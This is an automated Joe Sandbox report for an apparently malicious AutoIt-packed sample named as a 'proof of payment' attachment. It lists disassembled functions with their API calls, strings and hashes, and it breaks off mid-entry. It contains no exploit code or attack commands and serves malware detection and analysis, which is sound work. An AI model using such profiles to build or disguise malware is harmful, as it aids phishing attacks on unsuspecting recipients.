Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 0116c279c1671b37819af4786a1acc18079cd7ee703b3033b71c736c89aae48d
Instruction ID: fb048c513d2377b54073edcaa7f25f96991eae8dc11c0865581bd1677aeff232
Opcode Fuzzy Hash: 0116c279c1671b37819af4786a1acc18079cd7ee703b3033b71c736c89aae48d
Instruction Fuzzy Hash: 8A51A03160830AAB8314EF12CC91A7DB7AAFF94710B14581DF29B9F275DB60D845FB82

Function 00FBCC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FBCC68
__wcsnicmp.LIBCMT ref: 00FBCC80
__wcsnicmp.LIBCMT ref: 00FBCC98
__wcsnicmp.LIBCMT ref: 00FBCCB0
__wcsnicmp.LIBCMT ref: 00FBCCC8
__wcsnicmp.LIBCMT ref: 00FBCCE0
__wcsnicmp.LIBCMT ref: 00FBCCF8
__wcsnicmp.LIBCMT ref: 00FBCD0C
__wcsnicmp.LIBCMT ref: 00FBCD4D
__wcsnicmp.LIBCMT ref: 00FBCD61
__wcsnicmp.LIBCMT ref: 00FBCD75
__wcsnicmp.LIBCMT ref: 00FBCD89

Strings

#requireadmin, xrefs: 00FBCC92
#include-once, xrefs: 00FBCCC2
#ce, xrefs: 00FBCD83
Bad directive syntax error, xrefs: 01022ECB
#comments-end, xrefs: 00FBCD6F
#notrayicon, xrefs: 00FBCC7A
#pragma compile, xrefs: 00FBCC62
#comments-start, xrefs: 00FBCCF2, 00FBCD47
Unterminated group of comments, xrefs: 01022FB4
#include, xrefs: 00FBCCDA
#cs, xrefs: 00FBCD06, 00FBCD5B
#OnAutoItStartRegister, xrefs: 00FBCCAA
Cannot parse #include, xrefs: 01022FA1

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 78df5dbf629b30a14119d56eb047558bae1ef5f89ad5af7c8d08d6c07c52ee35
Instruction ID: c2f88228ad4e2b1ce12e305eab209ca7bdd6010e5cf73e5582bb1eb2237f109d
Opcode Fuzzy Hash: 78df5dbf629b30a14119d56eb047558bae1ef5f89ad5af7c8d08d6c07c52ee35
Instruction Fuzzy Hash: 93811B75640215BBDB15BAA6CD83FFF7BA9AF24300F044039F985AB182EB64D501FAD1

Function 0101C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0101C788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0101C83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 0101C859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 0101CB15

Strings

0, xrefs: 0101C89C

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 9cbe374b51ede87b1f257a190d3a1d2ed28c0e8394808812b79213682917c49a
Instruction ID: afb23e36c3ebf6b12a1dfeed4a44476c110f974d22795c86e02ecb653a354cef
Opcode Fuzzy Hash: 9cbe374b51ede87b1f257a190d3a1d2ed28c0e8394808812b79213682917c49a
Instruction Fuzzy Hash: 86F1D071184301AFF7218F28CA89BAABFE8FB49714F08055DF6D9D6299C779C840DB91

Function 0101638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0104DC00), ref: 01016449

Strings

ISVISIBLE, xrefs: 01016455
UNCHECK, xrefs: 010166A1
CURRENTTAB, xrefs: 010164DD
SHOWDROPDOWN, xrefs: 01016500
ISCHECKED, xrefs: 01016659
TABRIGHT, xrefs: 010164BD
GETCURRENTSELECTION, xrefs: 01016603
GETLINECOUNT, xrefs: 010166E4
GETCURRENTLINE, xrefs: 01016704
SENDCOMMANDID, xrefs: 010167CA
SELECTSTRING, xrefs: 01016626
GETCURRENTCOL, xrefs: 01016724
FINDSTRING, xrefs: 01016596
TABLEFT, xrefs: 010164A7
ADDSTRING, xrefs: 01016536
CHECK, xrefs: 0101668B
EDITPASTE, xrefs: 0101675B
HIDEDROPDOWN, xrefs: 01016520
GETSELECTED, xrefs: 010166C1
SETCURRENTSELECTION, xrefs: 010165D6
DELSTRING, xrefs: 01016569
GETLINE, xrefs: 0101678B
ISENABLED, xrefs: 0101648C

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 1a50beef6c4a7138e880bba45e7d4952f51c316eff8e0aa03484723b57ee6184
Instruction ID: 5a2ad7aa186b3f5c0c23e85d35f8bbdd26b5f282c95a95c1402ac09ec02706ac
Opcode Fuzzy Hash: 1a50beef6c4a7138e880bba45e7d4952f51c316eff8e0aa03484723b57ee6184
Instruction Fuzzy Hash: E2C195302042468BCB04EF14CD52E6E77E5BF95344F04489CF9D69B396DB6EE90ADB82

Function 0101D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0101D5AE
SetTextColor.GDI32(?,?), ref: 0101D5B2
GetSysColorBrush.USER32(0000000F), ref: 0101D5C8
GetSysColor.USER32(0000000F), ref: 0101D5D3
CreateSolidBrush.GDI32(?), ref: 0101D5D8
GetSysColor.USER32(00000011), ref: 0101D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101D5FE
SelectObject.GDI32(?,00000000), ref: 0101D60F
SetBkColor.GDI32(?,00000000), ref: 0101D618
SelectObject.GDI32(?,?), ref: 0101D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0101D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0101D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0101D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0101D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0101D6DD
DrawFocusRect.USER32(?,?), ref: 0101D6E8
GetSysColor.USER32(00000011), ref: 0101D6F6
SetTextColor.GDI32(?,00000000), ref: 0101D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0101D712
SelectObject.GDI32(?,0101D2A5), ref: 0101D729
DeleteObject.GDI32(?), ref: 0101D734
SelectObject.GDI32(?,?), ref: 0101D73A
DeleteObject.GDI32(?), ref: 0101D73F
SetTextColor.GDI32(?,?), ref: 0101D745
SetBkColor.GDI32(?,?), ref: 0101D74F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 2ef6d383d681f096c13c1fdc194ac0619a7ebd0f8e573a800c3372d47c76aabc
Instruction ID: 3268d95a8d1649372c5f193592ce3b7756a6f0121ecd5c689a73a3da39e51a87
Opcode Fuzzy Hash: 2ef6d383d681f096c13c1fdc194ac0619a7ebd0f8e573a800c3372d47c76aabc
Instruction Fuzzy Hash: FB514B71900208BFDF219FE8DC48EAEBBB9FB08324F104515FA55AB295D77A9A40DF50

Function 0101B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0101B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0101B7C1
CharNextW.USER32(0000014E), ref: 0101B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0101B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0101B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0101B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0101B875
SetWindowTextW.USER32(?,0000014E), ref: 0101B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0101B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0101B90E
_memset.LIBCMT ref: 0101B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0101B97C
_memset.LIBCMT ref: 0101B9DB
SendMessageW.USER32 ref: 0101BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0101BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0101BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0101BB2C
GetMenuItemInfoW.USER32(?), ref: 0101BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0101BBA3
DrawMenuBar.USER32(?), ref: 0101BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0101BBDA

Strings

0, xrefs: 0101BB4F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: f45a1d0ee1eaf51a16800f49063875cd2b13b29cec0f45c8588de42a4f14bf96
Instruction ID: f3df158d7ac3a1bad4c7ee042f345ea3729ef9e15145e1bddbabc637fbeb50b5
Opcode Fuzzy Hash: f45a1d0ee1eaf51a16800f49063875cd2b13b29cec0f45c8588de42a4f14bf96
Instruction Fuzzy Hash: C4E19475900218AFDF209FA5CC84EFE7BB9FF09714F04819AFA95AA188D7788541DF60

Function 0101764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0101778A
GetDesktopWindow.USER32 ref: 0101779F
GetWindowRect.USER32(00000000), ref: 010177A6
GetWindowLongW.USER32(?,000000F0), ref: 01017808
DestroyWindow.USER32(?), ref: 01017834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0101785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 010178A1
SendMessageW.USER32(?,00000421,?,?), ref: 010178B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 010178C9
IsWindowVisible.USER32(?), ref: 010178E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01017904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01017918
GetWindowRect.USER32(?,?), ref: 01017930
MonitorFromPoint.USER32(?,?,00000002), ref: 01017956
GetMonitorInfoW.USER32 ref: 01017970
CopyRect.USER32(?,?), ref: 01017987
SendMessageW.USER32(?,00000412,00000000), ref: 010179F2

Strings

(, xrefs: 01017965
0, xrefs: 01017735
tooltips_class32, xrefs: 01017856

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 3d0376c105475e7dca9728df24f337ea3edbe030893d73f84ddbb6d37b5e3393
Instruction ID: 83f74b31add93cba3a3bccd366028ca26bc6c22645e6d30622a2063c97f35be7
Opcode Fuzzy Hash: 3d0376c105475e7dca9728df24f337ea3edbe030893d73f84ddbb6d37b5e3393
Instruction Fuzzy Hash: 17B1BD71608301AFD750DFA9C944B6ABBE5FF88310F00891DF5D99B295DB79E804CB92

Function 00FF6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FF6CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FF6D21
_wcscpy.LIBCMT ref: 00FF6D4F
_wcscmp.LIBCMT ref: 00FF6D5A
_wcscat.LIBCMT ref: 00FF6D70
_wcsstr.LIBCMT ref: 00FF6D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FF6D97
_wcscat.LIBCMT ref: 00FF6DE0
_wcscat.LIBCMT ref: 00FF6DE7
_wcsncpy.LIBCMT ref: 00FF6E12

Strings

04090000, xrefs: 00FF6DCD
%u.%u.%u.%u, xrefs: 00FF6E75
\VarFileInfo\Translation, xrefs: 00FF6D8F
StringFileInfo\, xrefs: 00FF6D6A
DefaultLangCodepage, xrefs: 00FF6DFA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 3a1005604e7d0b780637b26b8cf1d53e59c30fb78c5d2966b1b0377312233c30
Instruction ID: 1654bb18310469097d3aebd12563a982a7ffcf49b262b8b71d72476daa485590
Opcode Fuzzy Hash: 3a1005604e7d0b780637b26b8cf1d53e59c30fb78c5d2966b1b0377312233c30
Instruction Fuzzy Hash: B341F772A00215BBE700AB65DD43FBF776DEF55310F08002AFA05E6252EF79E901A7A5

Function 00FCA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FCA939
GetSystemMetrics.USER32(00000007), ref: 00FCA941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FCA96C
GetSystemMetrics.USER32(00000008), ref: 00FCA974
GetSystemMetrics.USER32(00000004), ref: 00FCA999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FCA9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00FCA9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FCA9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FCAA0D
GetClientRect.USER32(00000000,000000FF), ref: 00FCAA2B
GetStockObject.GDI32(00000011), ref: 00FCAA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FCAA52

Part of subcall function 00FCB63C: GetCursorPos.USER32(000000FF), ref: 00FCB64F
Part of subcall function 00FCB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00FCB66C
Part of subcall function 00FCB63C: GetAsyncKeyState.USER32(00000001), ref: 00FCB691
Part of subcall function 00FCB63C: GetAsyncKeyState.USER32(00000002), ref: 00FCB69F

SetTimer.USER32(00000000,00000000,00000028,00FCAB87), ref: 00FCAA79

Strings

AutoIt v3 GUI, xrefs: 00FCA9F1

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 72595a9c67b87bc6c61217d2be39daf5be3be2a737abafdae23d4a683652bb67
Instruction ID: c4872e45f2458931cc64ca65a40434373b2efbb5d66989ef07eb08424356d544
Opcode Fuzzy Hash: 72595a9c67b87bc6c61217d2be39daf5be3be2a737abafdae23d4a683652bb67
Instruction Fuzzy Hash: FBB18C71A0020ADFDB24DFA8D946FAE7BB8FB08314F114219FA55A72C4DB39E841DB51

Function 00FB2EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00FB2F7A
IsWindow.USER32(?), ref: 010222FD

Strings

LAST, xrefs: 010220B6
ALL, xrefs: 01022264
REGEXPCLASS, xrefs: 01022149
INSTANCE, xrefs: 0102223C
REGEXPTITLE, xrefs: 010220F8
ACTIVE, xrefs: 010220CC
TITLE, xrefs: 01022292
HANDLE, xrefs: 010220E2
CLASS, xrefs: 01022128

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: 7b2ee1fdfeb268fe7a9dd5b27b4151eada86cdf61329d5f456c20371f4b6138e
Instruction ID: de5ad3a4de3671e3337a067437496fe946c786c6e0a69944b78c1d40034e3b76
Opcode Fuzzy Hash: 7b2ee1fdfeb268fe7a9dd5b27b4151eada86cdf61329d5f456c20371f4b6138e
Instruction Fuzzy Hash: 87D10530104242EBCB04EFA5C881AAABBF5FF54344F004A5DF4D6572A2DB34E59ADF91

Function 01013639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01013735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0104DC00,00000000,?,00000000,?,?), ref: 010137A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 010137EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01013874
RegCloseKey.ADVAPI32(?), ref: 01013B94
RegCloseKey.ADVAPI32(00000000), ref: 01013BA1

Strings

REG_EXPAND_SZ, xrefs: 01013811
REG_DWORD, xrefs: 01013A65
REG_QWORD, xrefs: 01013AE2
REG_BINARY, xrefs: 01013B2F
REG_MULTI_SZ, xrefs: 0101395C
REG_SZ, xrefs: 010138B2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: c5efdf859a57761fa93e1fb057c89fa51d5ba4a1d0881cea59453e95aa116f8f
Instruction ID: dbf70dfa0100849b8e3f18d9ce6cd3fdeeb38a1504e474de03ce80fee50fa06d
Opcode Fuzzy Hash: c5efdf859a57761fa93e1fb057c89fa51d5ba4a1d0881cea59453e95aa116f8f
Instruction Fuzzy Hash: 84025D752046019FDB14EF19C895A6EB7E9FF88720F08845DF99A9B361DB38ED01CB81

Function 01016BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 01016C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 01016D16

Strings

SELECTCLEAR, xrefs: 01016D8D
ISSELECTED, xrefs: 01016D21
GETSUBITEMCOUNT, xrefs: 01016CA1
SELECTALL, xrefs: 01016D75
GETTEXT, xrefs: 01016CBF
GETSELECTEDCOUNT, xrefs: 01016CF9
SELECT, xrefs: 01016DA8
GETITEMCOUNT, xrefs: 01016C84
DESELECT, xrefs: 01016DFC
FINDITEM, xrefs: 01016E81
VIEWCHANGE, xrefs: 01016ECD
GETSELECTED, xrefs: 01016E3C
SELECTINVERT, xrefs: 01016DDE

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 79d410d979242acebd75c26a407c1b2b36adfe4252385e466a5ab1df32f89c0b
Instruction ID: 74d64d1ac986483d35bacf7d191d3a29cc2e38f1b89dee9e77441cb32276ff4c
Opcode Fuzzy Hash: 79d410d979242acebd75c26a407c1b2b36adfe4252385e466a5ab1df32f89c0b
Instruction Fuzzy Hash: EFA1AE302042429BCB54EF24CD52AAEB3E5FF84314F04496CB9A69B3D6DB7AEC05DB51

Function 00FECF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00FECF91
__swprintf.LIBCMT ref: 00FED032
_wcscmp.LIBCMT ref: 00FED045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FED09A
_wcscmp.LIBCMT ref: 00FED0D6
GetClassNameW.USER32(?,?,00000400), ref: 00FED10D
GetDlgCtrlID.USER32(?), ref: 00FED15F
GetWindowRect.USER32(?,?), ref: 00FED195
GetParent.USER32(?), ref: 00FED1B3
ScreenToClient.USER32(00000000), ref: 00FED1BA
GetClassNameW.USER32(?,?,00000100), ref: 00FED234
_wcscmp.LIBCMT ref: 00FED248
GetWindowTextW.USER32(?,?,00000400), ref: 00FED26E
_wcscmp.LIBCMT ref: 00FED282

Strings

%s%u, xrefs: 00FED02C

Memory Dump Source

